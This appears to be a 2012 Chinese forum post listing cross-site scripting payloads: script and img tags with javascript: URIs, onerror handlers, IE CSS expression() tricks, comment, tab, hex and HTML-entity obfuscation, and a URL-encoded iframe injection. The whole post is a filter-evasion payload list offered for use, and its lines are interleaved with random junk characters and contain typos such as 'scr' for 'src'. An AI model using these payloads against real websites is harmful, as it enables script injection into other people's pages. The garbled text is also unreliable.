<script>alert("跨站")</script> (最常用)( M7 T+ {4 d% d/ a; P8 g8 \9 N% N
<img scr=javascript:alert("跨站")></img>
5 r4 z# a" N7 d* k7 N8 {9 k3 D<img scr="javascript: alert(/跨站/)></img>1 D7 k/ [6 P6 N9 i5 K6 m: N$ K9 Y
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
: A* j5 X* r" ?7 d<img scr="#" onerror=alert(/跨站/)></img>
- T- V- v: x' l2 x5 \1 F<img scr="#" style="xss:expression(alert(/xss/));"></img>
9 r3 z3 P+ u8 U( H( ~0 |! C8 s<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
" G \/ ~3 o3 \ x. J( _; J<img src=vbscript:msgbox ("xss")></img>/ A3 E5 a1 D9 I+ U7 n" |
<style> input {left:expression (alert('xss'))}</style>
) S$ w2 z5 P2 R7 A6 H I<div style={left:expression (alert('xss'))}></div>
8 o' j, q& U0 `$ E& S- W+ [) I<div style={left:exp/* */ression (alert('xss'))}></div> e! E& V$ }0 b+ ]. x9 g
<div style={left:\0065\0078ression (alert('xss'))}></div>
' P2 A2 _" ]2 O- ^" M( ehtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
Z$ S7 q) h( x G/ o) punicode <div style="{left:expRessioN (alert('xss'))}">- q/ z8 q1 K- e3 o% ~* p* u) v
+ m0 R$ Q% D3 c' J/ o) X% {' c"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>[") Q% {+ p3 `9 R0 J
|
发表于 2012-9-15 14:09:13
收藏
支持
反对